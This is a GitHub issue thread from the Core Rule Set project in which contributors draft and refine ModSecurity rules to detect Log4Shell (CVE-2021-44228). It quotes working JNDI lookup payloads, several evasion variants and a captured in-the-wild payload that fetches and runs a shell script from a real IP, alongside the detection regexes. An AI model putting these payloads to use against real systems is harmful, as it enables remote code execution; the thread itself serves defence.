### ISSUE TITLE
Rule against CVE-2021-44228

### ISSUE THREAD

**Issue by fionera** [coreruleset/coreruleset#2331]
### Motivation
A thread was started in #2330 regarding the Log4J CVE. This issue is to track the request for a specialized rule for it. Currently it is blocked with the following result:
```
$ curl -H "x-format-output: txt-matched-rules" -H "x-crs-version: 3.3.2" \
--data 'foo=${jndi:ldap://attacker.com/a}' \
https://sandbox.coreruleset.org/
932130 PL1 Remote Command Execution: Unix Shell Expression Found
949110 PL1 Inbound Anomaly Score Exceeded (Total Score: 5)
```

### Proposed solution
Maybe create a specific rule to block log4j Formatting Type payloads

### Additional context
Known Payloads:
```
${java:vm}
${jndi:ldap://attacker.com/a}
```

https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps
https://www.techtimes.com/articles/269208/20211210/minecraft-vulnerability-spotted-how-to-fix-log4j-bug.htm
https://www.cve.org/CVERecord?id=CVE-2021-44228

**Comment by dune73** [comment]
For the record: `${java:vm}` is equally detected by 932130.

**Comment by theMiddleBlue** [comment]
https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

**Comment by dune73** [comment]
Got this as a contribution:

```
SecRule
REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:
/*|XML://@*
\
    "@rx \${jndi:(?:ldap|iiop|rmi)://.*/a}" \
    "id:CVE_202144228,\
    phase:2,\
    block,\
    t:none,t:lowercase,t:urlDecodeUni,\
    multimatch,\
    log,\
    msg:'Remote Command Execution: Log4j CVE-2021-44228' \
    logdata:'Matched Data: %{MATCHED_VAR} found within
%{MATCHED_VAR_NAME}',\
    tag:'application-multi',\
    tag:'language-java',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/137/6',\
    tag:'PCI/6.5.2',\
    tag:'paranoia-level/1',\
    ver:'OWASP_CRS/3.3.x',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
```

**Comment by Jordy694** [comment]
Would love to see this feature being enabled and added!

**Comment by mac-chaffee** [comment]
> Currently it is blocked

Seems that's not true if the malicious payload is in a header like how the vulnerable application works in this post: https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps

Because rule 932130 doesn't check REQUEST_HEADERS: https://github.com/coreruleset/coreruleset/blob/eb0944462b1c0374dfff12a57550f6c1ce6ede5a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf#L327

**Comment by dune73** [comment]
Yes. Confirmed.

When we posted the test above, it was not known the headers were being attached.

**Comment by DaspawnW** [comment]
Thanks for the core rule out of another gist I think ldaps and dns are missing there

**Comment by dune73** [comment]
For the record. Adding User-Agent to 932130 works as follows:

```
SecRuleUpdateTargetById 932130 "REQUEST_HEADERS:User-Agent"
```

ATTENTION: Add after the CRS include.

**Comment by DaspawnW** [comment]
I think for the rule for jndi also there needs to be some wildcard between `//` and `}`.

For me I dropped now the ending square bracket

**Comment by spartantri** [comment]
Missing the target in the RX, update it the RX to: "@rx \${jndi:(?:ldap|iiop|rmi)://.+}"

We are missing also the bypass attempts like `${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x` so 
"@rx \${jndi:(?:\${.+|ldap|iiop|rmi)://.+}"

See CloudFlare's blog: https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/

**Comment by dune73** [comment]
Not that I want to make this any worse, but it seems the `jndi` keyword can be avoided too:

` ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}`

Source: https://twitter.com/Rezn0k/status/1469523006015750146

**Comment by christiantreutler-avi** [comment]
But your example Christian is still blocked by default isn't it?

> Not that I want to make this any worse, but it seems the `jndi` keyword can be avoided too:
> 
> ` ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}`
> 
> Source: https://twitter.com/Rezn0k/status/1469523006015750146

**Comment by dune73** [comment]
With 932130 it is still detected, but said rule is not covering the User-Agent in CRS. So you need to expand. 

Yet 932130 is said to cause false positives, so adding UA might make things even worse.

Would you have the means to check that on a scale quickly?

**Comment by mirkodziadzka-avi** [comment]
As 932130 seems to result in false positives in headers, why not add 1 or 2 specific rules for this vulnerability.
Based on https://github.com/coreruleset/coreruleset/issues/2331#issuecomment-991168535, I propose 2 patterns:

- `"@rx \${(?:jndi|java):"` - detect the attack itself
- `"@rx \${.*\${"` - detect an evasion attempts from above

Can be combined into one: `"@rx \${(?:jndi|java|.*\${):"`.

**Comment by mac-chaffee** [comment]
As @dune73 pointed out, The string "jndi" doesn't have to appear all together since log4j supports many types of expansion (even within "jndi"), including environment variable expansion and uppercase/lowercase expansion: https://logging.apache.org/log4j/2.x/manual/lookups.html

Maybe a rule like `@rx \${[\w${}\-:]*j[\w${}\-:]*n[\w${}\-:]*d[\w${}\-:]*i[\w${}\-:]*:[\w${}\-:]*}` would help, which essentially allows zero or more letters, dollar signs, curly brackets, dashes, and colons between each letter: https://regexr.com/6bbvv

**Comment by mirkodziadzka-avi** [comment]
I agree, but the current problem is "jndi" because this allows remote code execution.
We are pushing rules similar as above to our customers now.

I'm not sure if a more generic rule like `@rx ${\w+:` would not run into false positives in some headers.

**Comment by dune73** [comment]
```
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc
```

https://twitter.com/thejonmccoy/status/1470048694619684866

**Comment by mirkodziadzka-avi** [comment]
This would match the evasion attempt detection pattern 

 - "@rx \${.*\${" - detect an evasion attempts from above

**Comment by dejablue79** [comment]
I'm getting "Expecting an action, got:  id:CVE_202144228" with the rule above, is it an indentation issue?

**Comment by RedXanadu** [comment]
@dejablue79 Standard ModSecurity builds only support numeric rule IDs. Try switching out that ASCII ID for a number, e.g. `id:1000`, or something else that doesn't conflict with your other rules.

**Comment by na1ex** [comment]
> This would match the evasion attempt detection pattern
> 
>     * "@rx ${.*${" - detect an evasion attempts from above

Agreed, but matches on ${Foo}abc${bar}

-  "@rx \${[^}]*\${" : detect evasion attempts as seemingly there is a need for 'double evasion'.
-  "@rx \${jndi:(?:ldap|iiop|dns|rmi):" : detects otherwise
Applied to  REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* 

Note, going "@rx \${[^}]*\${.*}.*}" is more accurate but has more potential for hitting a pcre recursion limit, and is less perf.

**Comment by mac-chaffee** [comment]
Don't forget that `(?:ldap|iiop|dns|rmi)` is missing `ldaps`: 

> By default the JDNI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the log4j2.allowedJndiProtocols property.

https://logging.apache.org/log4j/2.x/manual/lookups.html

But regardless, having the full string "ldaps" or "jndi" as part of your rule means it can be trivially circumvented with something like `${jn${lower:d}i:ld${env:FAKEENVVAR:-a}p://...}`.

To anyone coming across this thread just now from google or elsewhere: please read the whole thread before copy/pasting any code snippets :sweat_smile:

**Comment by dune73** [comment]
Yes, your ModSec probably does not accept alpha-numerical IDs. Put in an integer. 1000 would work.

**Comment by ihacku** [comment]
Matching ${ is not enough，there are unicode and hex encode situation https://mp-weixin-qq-com.translate.goog/s/vAE89A5wKrc-YnvTr0qaNg?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=zh-CN

**Comment by theMiddleBlue** [comment]
just received this payload/evasion

```
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82Mi4xNTIuMTE4LjE2Nzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC82Mi4xNTIuMTE4LjE2Nzo4MCl8YmFzaA==}
```

blocked by 932130

**Comment by dune73** [comment]
Log4j scaner with fuzzing support by @fullhunt / Mazin Ahmed:

https://github.com/fullhunt/log4j-scan

**Comment by dune73** [comment]
New blog post about CRS and this vulnerability:

https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/

**Comment by dune73** [comment]
Just writing down a proposal, so this option is not forgotten.

We could extend coverage of 932130 and also do stricter siblings of this rule.

#### Variant 1

* Expand 932130 with UA und Referer
* Add stricter sibling 932131 that does all the other headers at PL2

#### Variant 2:
* Add stricter sibling 932131 to cover UA und Referer at PL2
* Add stricter sibling 932132 to cover all other HTTP headers at PL3

#### Variant 3:
* Add stricter sibling 932131 to cover all headers at PL2

**Comment by dune73** [comment]
With all the information coming out in the last few days and a new attack where the `}` of the call is missing, I am closing in on the following regex - in pseudo code so far - to catch everything attacking log4shell:

* It detects `${jndi`
* It detects nested `${`

The idea is that you either have to write `jndi` - or you have to express it in plain letters.

Very happy to hear your feedback about this.

Question: Can you add whitespace in between the letters of `jndi` and log4j still executes this? Not sure I have seen this - seen so many payloads those last few days.

**Comment by na1ex** [comment]
Whitespaces or some other disclosed evasion techniques are not successful (backend used https://github.com/christophetd/log4shell-vulnerable-app ) .
Whitespace evasion and others may work on backends using tomcat's like engine, TBC.

**Comment by dune73** [comment]
@na1ex Could you elaborate on the whitespace and maybe give a workable example? Would be really thankful.

**Comment by dune73** [comment]
I've update the blog post at https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/ with a new generic rule 1005 based on the idea above. Much simpler now. Not yet sure about false positives and a certain potential for ReDoS, but that seems acceptable given the context.

**Comment by mirkodziadzka-avi** [comment]
Thanks for the rule update in the blogpost.

Would it make sense to change the `\${[^}]*\${` to `\${[^}]{0,4}\${`? It would reduce the potential runtime of this regex and should be enought, because the evasion must be happen in the first 4 characters or we would see the original `${jndi`

Regarding whitspaces: Not sure if the are allowed, but I noticed that F5 iRule example from https://support.f5.com/csp/article/K19026212#proc2 is checking for spaces: `\$\{\s*(j|\$?\{.+?\})`

**Comment by dune73** [comment]
Thank you @mirkodziadzka-avi. We've been discussing this on the public channel on slack too. The problem is again the whitespace `\s*`. We can't rule that out or can we?

**Comment by mirkodziadzka-avi** [comment]
@dune73 I'm not sure about the whitespace. Yes, if whitespaces are allowed, then the limit to 4 will not work.
But If whitespaces are allowed, then probably only between '${' and the command (just a guess). In any case, whitespace in the probably allowed between `${` and `jndi` too. So the rule could be `\${\s*jndi` and the evasion check `\${\s*[^\s}]{0,4}\${`. In summary, I really do not know.

Sidenote:

 - From all the evasion patterns we collected in the last days, we have never seen one with a whitespace. But there are new tools out every day.
 - From all the rules (IDS and WAF) I have seen so far, only F5 is checking for whitespace. 

Heading over to slack now, so feel free to ping me there.

**Comment by franbuehler** [comment]
Outcome [issue chat meeting December 2021](https://github.com/coreruleset/coreruleset/issues/2291#issuecomment-987122691): Everything in 944 and at PL1. @dune73 will provide the PRs.

**Comment by xx-zhang** [comment]
> Got this as a contribution from a commercial integrator.
> 
> ```
> SecRule
> REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@*  \
>     "@rx \${jndi:(?:ldap|iiop|rmi)://}" \
>     "id:CVE_202144228,\
>     phase:2,\
>     block,\
>     t:none,t:lowercase,t:urlDecodeUni,\
>     multimatch,\
>     log,\
>     msg:'Remote Command Execution: Log4j CVE-2021-44228', \
>     logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
>     tag:'application-multi',\
>     tag:'language-java',\
>     tag:'platform-multi',\
>     tag:'attack-rce',\
>     tag:'OWASP_CRS',\
>     tag:'capec/1000/152/137/6',\
>     tag:'PCI/6.5.2',\
>     tag:'paranoia-level/1',\
>     ver:'OWASP_CRS/3.3.x',\
>     severity:'CRITICAL',\
>     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
>     setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
> ```

can not detect the attack anti-waf with env-values of `lower/upper-` ; this is a demo for jndi//rmi, and `dns/ldap` is mising 
```
## test.data 
# https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
# ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://
# ${${::-j}ndi:rmi://
# ${jndi:rmi://
# ${${lower:jndi}:${lower:rmi}://
# ${${lower:${lower:jndi}}:${lower:rmi}://
# ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://
# ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://
# ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://
#
#  ./regexp-assemble-v2.pl test.data
# # yum -y install cpan; cpan install Regexp::Assemble

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx .*\$\{(?:(\$\{\:\:\-j\}|j|J|\$\{lower\:j\}|\$\{upper\:j\})(\$\{\:\:\-n\}|n|N|\$\{lower\:n\}|\$\{upper\:n\})(\$\{\:\:\-d\}|d|D|\$\{lower\:d\}|\$\{upper\:d\})(\$\{\:\:\-i\}|i|I|\$\{lower\:i\}|\$\{upper\:i\}):(\$\{\:\:\-r\}|r|R|\$\{lower\:r\}|\$\{upper\:j\})(\$\{\:\:\-m\}|m|M|\$\{lower\:m\}|\$\{upper\:m\})(\$\{\:\:\-i\}|i|I|\$\{lower\:i\}|\$\{upper\:i\})|\$\{lower:(?:j(?:\}\$\{(?:upper:n\}\$\{lower:d\}\$\{upper:i\}:\$\{lower:r\}m\$\{lower:i\}|lower:n\}\$\{lower:d\}i:\$\{lower:rmi)|ndi\}:\$\{lower:rmi)|\$\{lower:jndi\}\}:\$\{lower:rmi)\}):\/\/.*" \
    "id:7170001,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Apache Log4j Rce Exploit (CVE-2021-44228)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'attack-rce',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
```

**Comment by fzipi** [comment]
Now that we have this rule in place, are we planning on porting it back? Or this one should be closed now?

**Comment by dune73** [comment]
We don't really have the rules in place yet - there is still movement - so I think this should be kept open.

As far as backporting is concerned, I'd rather not leave our policy of _no new rules to existing stable release lines_, but we may want to look into something like an _emergency rules plugin_ for the future - or some similar concept.

**Comment by dune73** [comment]
We're getting there. Here is the pull request: #2349

**Comment by dune73** [comment]
Closing this in favor of #2349.
